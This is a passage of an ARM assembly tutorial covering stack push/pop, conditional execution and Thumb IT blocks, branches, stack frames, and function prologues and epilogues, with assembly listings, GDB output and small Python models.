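    """Model PUSH {regs}; `values` are ordered from lowest to highest register."""
    sp -= WORD * len(values)              # SP is decreased first
    for i, value in enumerate(values):    # lowest register -> lowest address
        memory[sp + WORD * i] = value
    return sp

def pop(memory, sp, count):
    """Model POP {regs}; returns (values, new_sp), lowest register first."""
    values = [memory[sp + WORD * i] for i in range(count)]
    return values, sp + WORD * count      # SP is increased afterwards

memory = {0xbefff7e0: 0x1}                # illustrative initial stack contents
sp = 0xbefff7e0
sp = push(memory, sp, [3, 4])             # push {r0, r1} with r0 = 3, r1 = 4
print(hex(sp), memory[sp], memory[sp + WORD])
(r2, r3), sp = pop(memory, sp, 2)         # pop {r2, r3}
print(hex(sp), r2, r3)
```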

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instructions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp!, reglist (see ARM Manual).
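
We can convince ourselves of this by decoding the instruction words from the objdump listing by hand. The sketch below is a simplified decoder written for illustration (the function name decode_block_transfer is made up); it looks only at the P, U, W and L bits, the base register field and the register list of the A32 load/store multiple encoding, and ignores the condition field and the S bit.

```python
def decode_block_transfer(word):
    """Decode the main fields of an A32 load/store multiple instruction word."""
    if (word >> 25) & 0b111 != 0b100:
        raise ValueError("not a load/store multiple encoding")
    before = (word >> 24) & 1        # P bit: 1 = before, 0 = after
    up = (word >> 23) & 1            # U bit: 1 = increment, 0 = decrement
    writeback = (word >> 21) & 1     # W bit: the "!" after the base register
    load = (word >> 20) & 1          # L bit: 1 = LDM, 0 = STM
    base = (word >> 16) & 0xF        # Rn: base register number (13 = SP)
    regs = [i for i in range(16) if (word >> i) & 1]
    mnemonic = ("ldm" if load else "stm") \
        + ("i" if up else "d") + ("b" if before else "a")
    return mnemonic, base, bool(writeback), regs

for word in (0xe92d0003, 0xe8bd000c, 0xe8bd0030):
    print(hex(word), decode_block_transfer(word))
```

The first word decodes to STMDB with base register 13 (SP), writeback, and registers 0 and 1, which is exactly what the disassembler prints as push {r0, r1}.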

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are popped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    CONDITIONAL EXECUTION

    We already briefly touched on the topic of conditions while discussing the CPSR register. We use conditions to control the program’s flow at runtime, usually by making jumps (branches) or by executing an instruction only when a condition is met. A condition is described as the state of specific bits in the CPSR register. Those bits change based on the outcome of certain instructions. For example, when we compare two numbers and they turn out to be equal, the Zero bit is set (Z = 1), because under the hood the following happens: a - b = 0. In this case we have the EQual condition. If the first number was bigger, we would have a Greater Than (GT) condition, and in the opposite case Less Than (LT). There are more conditions, like Less than or Equal (LE), Greater than or Equal (GE), and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. Negative bit gets set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above causes the Negative bit to be set (2 - 3 = -1), indicating that the value in r0 is Less Than 3. Subsequently, the ADDLT instruction is executed because the LT condition is fulfilled when V != N (the values of the overflow and negative bits in the CPSR are different). Before we execute the second CMP, r0 = 3. That’s why the second CMP clears the Negative bit (because 3 - 3 = 0, there is no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0, which causes the LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.
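
To make the flag logic concrete, here is a small Python model of CMP and of the condition checks. It is a sketch for illustration only: the names cmp_flags, CONDITIONS and condition_passed are made up, and the model covers just the 32-bit subtraction that CMP performs. The loop at the end replays the CMP / ADDLT pair from the example twice.

```python
MASK = 0xFFFFFFFF

def cmp_flags(a, b):
    """Return (N, Z, C, V) as produced by CMP a, b, which computes a - b."""
    a &= MASK
    b &= MASK
    result = (a - b) & MASK
    n = result >> 31                              # sign bit of the result
    z = int(result == 0)
    c = int(a >= b)                               # carry set means "no borrow"
    v = (((a ^ b) & (a ^ result)) >> 31) & 1      # signed overflow
    return n, z, c, v

CONDITIONS = {
    "eq": lambda n, z, c, v: z == 1,
    "ne": lambda n, z, c, v: z == 0,
    "hs": lambda n, z, c, v: c == 1,              # also written cs
    "lo": lambda n, z, c, v: c == 0,              # also written cc
    "mi": lambda n, z, c, v: n == 1,
    "pl": lambda n, z, c, v: n == 0,
    "vs": lambda n, z, c, v: v == 1,
    "vc": lambda n, z, c, v: v == 0,
    "hi": lambda n, z, c, v: c == 1 and z == 0,
    "ls": lambda n, z, c, v: c == 0 or z == 1,
    "ge": lambda n, z, c, v: n == v,
    "lt": lambda n, z, c, v: n != v,
    "gt": lambda n, z, c, v: z == 0 and n == v,
    "le": lambda n, z, c, v: z == 1 or n != v,
    "al": lambda n, z, c, v: True,
}

def condition_passed(cond, flags):
    """Check a condition code against an (N, Z, C, V) tuple."""
    return CONDITIONS[cond](*flags)

r0 = 2
for _ in range(2):                                # CMP / ADDLT appears twice
    flags = cmp_flags(r0, 3)
    if condition_passed("lt", flags):
        r0 += 1                                   # addlt r0, r0, #1
print(r0)
```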

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions, specifically the Thumb version which allows conditional execution (Thumb-2). Some ARM processor versions support the “IT” instruction, which allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same as the condition of the IT instruction or its logical inverse. This means that if you use ITTE, the first and second instruction (Then-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrate this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; A branch instruction can only be used as the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the condition codes and their opposites:
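
The inverse pairs can also be written down as a small lookup. The Python sketch below (the names INVERSE and it_block_conditions are made up for illustration) expands an IT mnemonic and its condition into the condition suffix that each instruction in the block is expected to carry.

```python
# Each condition code and its logical inverse.
INVERSE = {
    "eq": "ne", "ne": "eq",
    "hs": "lo", "lo": "hs",
    "cs": "cc", "cc": "cs",      # alternative spellings of hs / lo
    "mi": "pl", "pl": "mi",
    "vs": "vc", "vc": "vs",
    "hi": "ls", "ls": "hi",
    "ge": "lt", "lt": "ge",
    "gt": "le", "le": "gt",
}

def it_block_conditions(mnemonic, cond):
    """Expand e.g. ("ITTE", "NE") into the suffixes of the block's instructions."""
    mnemonic = mnemonic.lower()
    cond = cond.lower()
    if not mnemonic.startswith("it") or len(mnemonic) > 5:
        raise ValueError("not an IT mnemonic: " + mnemonic)
    switches = mnemonic[2:]                  # the optional x, y, z letters
    if any(s not in ("t", "e") for s in switches):
        raise ValueError("switches must be T or E")
    suffixes = [cond]                        # the first instruction is always "Then"
    for s in switches:
        suffixes.append(cond if s == "t" else INVERSE[cond])
    return suffixes

print(it_block_conditions("ITTE", "NE"))
print(it_block_conditions("ITE", "GT"))
print(it_block_conditions("ITTEE", "EQ"))
```

The three calls correspond to the three valid IT blocks shown earlier.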

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ R3 = PC + 1 (in ARM state PC reads as the address of this instruction + 8)
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction stores the value of PC plus 1 in R3, and the second branches to the address in R3. This causes a switch to Thumb state, because the LSB (least significant bit) of the target address is 1. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10. Assuming R0 holds 0, this sets the Negative flag (0 - 10 = -10). Then we use an If-Then-Else block. This block skips the ADDEQ instruction because the Z (Zero) flag is not set, and executes the ADDNE instruction because R0 is NE (not equal) to 10.

    Stepping through this code in GDB will mess up the result, because you would execute both instructions in the ITE block. However, running the code in GDB without setting a breakpoint and stepping through each instruction yields the correct result, setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of code or jump to a specific function. The best examples of such use cases are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N != V) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
        int max = 0;
        int a = 2;
        int b = 3;
        if (a < b) {
            max = b;
        }
        else {
            max = a;
        }
        return max;
    }

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
        int a = 0;
        while (a < 4) {
            a = a + 1;
        }
        return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves the address of the next instruction (the address of the BL instruction + 4 in ARM state) in LR and jumps to the function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set between ARM and Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of PC, increase it by 1, store the result in a register, and branch (+exchange) to that register. In ARM state, reading PC yields the address of the current instruction + 8. In this example that value is 0x805C, so the addition (add r2, pc, #1) produces 0x805C + 1 = 0x805D. The exchange happens because the Least Significant Bit (LSB) of the address we branch to is 1 (0x805D = 10000000 01011101 in binary). The processor uses this bit only to select the instruction set and does not treat it as part of the branch address, so branching to such an address won’t cause any misalignment issues. This is what it looks like in GDB (with the GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.
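
The address arithmetic behind this trick can be checked with a few lines of Python. This is a sketch, not ARM code: the helper names arm_pc_read and bx are made up, and the address 0x8054 for the ADD instruction is an assumption derived from the PC value 0x805C mentioned above.

```python
def arm_pc_read(instruction_address):
    """Value an ARM-state instruction sees when it reads PC."""
    return instruction_address + 8

def bx(target):
    """Model BX: returns (address execution continues at, instruction set)."""
    state = "Thumb" if target & 1 else "ARM"
    return target & ~1, state          # bit 0 only selects the state

add_address = 0x8054                   # assumed address of "add r2, pc, #1"
r2 = arm_pc_read(add_address) + 1      # add r2, pc, #1
address, state = bx(r2)                # bx r2
print(hex(r2), hex(address), state)
```

Execution continues at 0x805c, which is where the first Thumb instruction is located, right after the 4-byte ADD and BX instructions.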

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function if a specific condition is met. Let’s look at a very simple example of a conditional branch using BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value.

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr

    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers Stack’s purpose and operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use the Stack for storing temporary data such as local variables of a function, environment variables which help us to transition between functions, etc. We interact with the Stack using PUSH and POP instructions. As explained in Memory Instructions: Load And Store, PUSH and POP are aliases for other memory-related instructions rather than real instructions, but we use PUSH and POP for simplicity.

    Before we look into a practical example it is important for us to know that the Stack can be implemented in various ways. First, when we say that the Stack grows, we mean that an item (32 bits of data) is put onto the Stack. The Stack can grow toward lower memory addresses (when it is implemented in a Descending fashion) or toward higher memory addresses (when it is implemented in an Ascending fashion). The actual location where the next (32-bit) piece of information will be put is defined by the Stack Pointer, or to be precise, by the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item in the Stack or to the next available memory slot. If the SP is currently pointing to the last item in the Stack (Full stack implementation), the SP will be decreased (in case of a Descending Stack) or increased (in case of an Ascending Stack) and only then will the item be placed on the Stack. If the SP is currently pointing to the next empty slot in the Stack (Empty stack implementation), the data will be placed first and only then will the SP be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.
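
The four combinations can also be expressed as a short model. The Python sketch below is an illustration, not ARM code: the names STACK_TYPES, push and pop and the starting address 0x1000 are made up. Each stack type is listed together with the Store Multiple / Load Multiple instructions that implement a push and a pop for it (the stack-oriented alias is given in parentheses).

```python
WORD = 4

# type: (grows toward, SP points at, push instruction, pop instruction)
STACK_TYPES = {
    "FD": ("lower addresses",  "last item",  "STMDB (STMFD)", "LDMIA (LDMFD)"),
    "FA": ("higher addresses", "last item",  "STMIB (STMFA)", "LDMDA (LDMFA)"),
    "ED": ("lower addresses",  "empty slot", "STMDA (STMED)", "LDMIB (LDMED)"),
    "EA": ("higher addresses", "empty slot", "STMIA (STMEA)", "LDMDB (LDMEA)"),
}

def push(memory, sp, value, kind):
    """Push one word onto a stack of the given kind; returns the new SP."""
    step = -WORD if kind[1] == "D" else WORD
    if kind[0] == "F":              # Full: move SP first, then store
        sp += step
        memory[sp] = value
    else:                           # Empty: store first, then move SP
        memory[sp] = value
        sp += step
    return sp

def pop(memory, sp, kind):
    """Pop one word; returns (value, new SP)."""
    step = -WORD if kind[1] == "D" else WORD
    if kind[0] == "F":              # Full: load first, then move SP back
        value = memory[sp]
        sp -= step
    else:                           # Empty: move SP back first, then load
        sp -= step
        value = memory[sp]
    return value, sp

for kind, (direction, points_at, store, load) in STACK_TYPES.items():
    memory = {}
    sp = push(memory, 0x1000, 2, kind)
    print(kind, direction, points_at, store, load, hex(sp), memory)
```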

    In our examples we will use the Full Descending Stack. Let’s take a quick look at a simple exercise which deals with such a Stack and its Stack Pointer.

    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to its initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of R0. We then use POP to restore the previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed to by the address in SP. Then, the SP register’s value is increased by 4 (it becomes 0xbefff6f8 again). As a result, the register R0 contains the integer value 2.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of the Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the Stack which is dedicated to a specific function. A Stack Frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the Stack Frame and then the buffer for the Stack Frame is allocated. The Stack Frame (starting from its bottom) generally contains the return address (previous LR), the previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined above are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int max(int a, int b);   /* forward declarations, so that main can call max */
    int do_nothing(void);
    
    int main()
    {
        int res = 0;
        int a = 1;
        int b = 2;
        res = max(a, b);
        return res;
    }
    
    int max(int a, int b)
    {
        do_nothing();
        if (a < b)
        {
            return b;
        }
        else
        {
            return a;
        }
    }
    
    int do_nothing(void)
    {
        return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that we are currently about to leave the function max (see the arrow in the disassembly at the bottom). In this state, the FP (R11) points to 0xbefff254, which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418, which is the return address (previous LR). At the next lower address (0xbefff250) we have the value 0xbefff26c, which is the address of the previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed contained only LR, FP and two local variables.
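
The layout we just read off the screenshot can be captured in a few lines of Python. This is only a sketch of that particular frame: the helper name describe_frame is made up, the memory contents are the values quoted above, and the layout (saved LR at FP, previous FP one word below it, locals below that) is the one from this example rather than a universal rule.

```python
WORD = 4

def describe_frame(memory, fp, local_count):
    """Read the fields of a frame in which FP points at the saved LR."""
    return {
        "return_address": memory[fp],
        "previous_fp": memory[fp - WORD],
        "locals": [memory[fp - WORD * (2 + i)] for i in range(local_count)],
    }

# Stack contents as quoted from the GDB screenshot.
memory = {
    0xbefff254: 0x00010418,   # return address (previous LR)
    0xbefff250: 0xbefff26c,   # previous Frame Pointer
    0xbefff24c: 0x1,          # local variable
    0xbefff248: 0x2,          # local variable
}

frame = describe_frame(memory, 0xbefff254, local_count=2)
print({key: value if key == "locals" else hex(value) for key, value in frame.items()})
```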

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing the values of LR and R11 onto the Stack) and to set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on the compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case the function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we would additionally use the Stack to store the remaining parameters. It is also worth mentioning that the result of a function is returned via the register R0. So whatever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeding the size of a 32-bit register). In that case we can use R0 combined with R1 to return a 64-bit result.
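
As a rough illustration of these rules, the following Python sketch distributes arguments between registers and the Stack and splits a 64-bit result across R0 and R1. It is a simplification: the helper names place_arguments and return_64bit are made up, only word-sized integer arguments are considered, and the split assumes a little-endian target where R0 holds the low word.

```python
MASK32 = 0xFFFFFFFF

def place_arguments(args):
    """Split word-sized arguments between R0-R3 and the Stack."""
    registers = {"r%d" % i: value & MASK32 for i, value in enumerate(args[:4])}
    stack = [value & MASK32 for value in args[4:]]   # remaining arguments
    return registers, stack

def return_64bit(value):
    """Split a 64-bit result into (r0, r1); r0 = low word (assumes little-endian)."""
    return value & MASK32, (value >> 32) & MASK32

print(place_arguments([1, 2]))                 # max(a, b): both arguments fit in registers
print(place_arguments([1, 2, 3, 4, 5, 6]))     # the fifth and sixth go onto the Stack
print([hex(word) for word in return_64bit(0x1122334455667788)])
```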

    The last part of the function, the epilogue, is used to restore the program’s state to its initial one (before the function call) so that it can continue from where it left off. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing an add or sub operation. Once we readjust the Stack Pointer, we restore the register values that were saved in the prologue by popping them from the Stack into the respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use a BX instruction to leave the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know, that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left off before calling the function.
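
To see that the epilogue really undoes the prologue, we can replay the example instructions in a small Python model. This is a sketch under assumptions: the function name run_frame is made up, the register values passed in are arbitrary illustrative numbers, and the model follows the prologue and epilogue shown above literally (so R11 ends up pointing at the saved R11 slot).

```python
WORD = 4

def run_frame(sp, r11, lr):
    """Replay the example prologue and epilogue; returns the final state."""
    memory = {}

    # push {r11, lr}
    sp -= 2 * WORD
    memory[sp] = r11                 # lower register -> lower address
    memory[sp + WORD] = lr
    # add r11, sp, #0
    r11 = sp
    # sub sp, sp, #16
    sp -= 16
    lowest_sp = sp                   # SP while the body of the function runs

    # ... the body of the function would execute here ...

    # sub sp, r11, #0
    sp = r11
    # pop {r11, pc}
    r11 = memory[sp]
    pc = memory[sp + WORD]
    sp += 2 * WORD
    return {"sp": sp, "r11": r11, "pc": pc, "lowest_sp": lowest_sp}

state = run_frame(sp=0xbefff700, r11=0xbefff720, lr=0x10418)
print({name: hex(value) for name, value in state.items()})
```

After the epilogue, SP and R11 hold the values they had on entry, and PC holds the address that was in LR when the function was called.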

    Another key point to know about functions is their types: leaf and non-leaf. A leaf function is a function which does not call/branch to another function from itself. A non-leaf function is a function which, in addition to its own logic, does call/branch to another function. The implementations of these two kinds of functions are similar. However, they have some differences. To analyze the differences between these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max, which is a leaf function. As mentioned before, a non-leaf function calls/branches to another function, which is true in our case, because we branch to the function max from the function main. The function max in this case does not branch to another function within its body, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of the prologues of non-leaf and leaf functions:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the entry of the prologue in the non-leaf function saves more registers onto the Stack. The reason behind this is that, by the nature of the non-leaf function, the LR gets modified during the execution of such a function and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if necessary.
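
Why the saved LR matters can be shown with a tiny Python model. It is a sketch with made-up names and addresses: run_outer stands for a non-leaf function that was called with LR = 0x1000 and that contains a BL instruction at the hypothetical address 0x2000.

```python
def run_outer(save_lr):
    """Return the address that the non-leaf function finally returns to."""
    lr = 0x1000                  # return address into the caller (hypothetical)
    stack = []

    if save_lr:
        stack.append(lr)         # prologue: push {r11, lr} (only LR modelled)

    # BL inner, located at the hypothetical address 0x2000, overwrites LR
    lr = 0x2000 + 4
    # inner is a leaf function; its "bx lr" returns to 0x2004 inside outer

    if save_lr:
        return stack.pop()       # epilogue: pop {r11, pc}
    return lr                    # "bx lr" with the overwritten LR

print(hex(run_outer(save_lr=True)))
print(hex(run_outer(save_lr=False)))
```

With the LR saved, the function returns to its caller. Without it, the return lands at 0x2004, right after its own BL instruction, and the original return address is lost.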

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to an address stored in the LR register in the leaf function’s case and by direct POP to PC register in the non-leaf function.

    /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

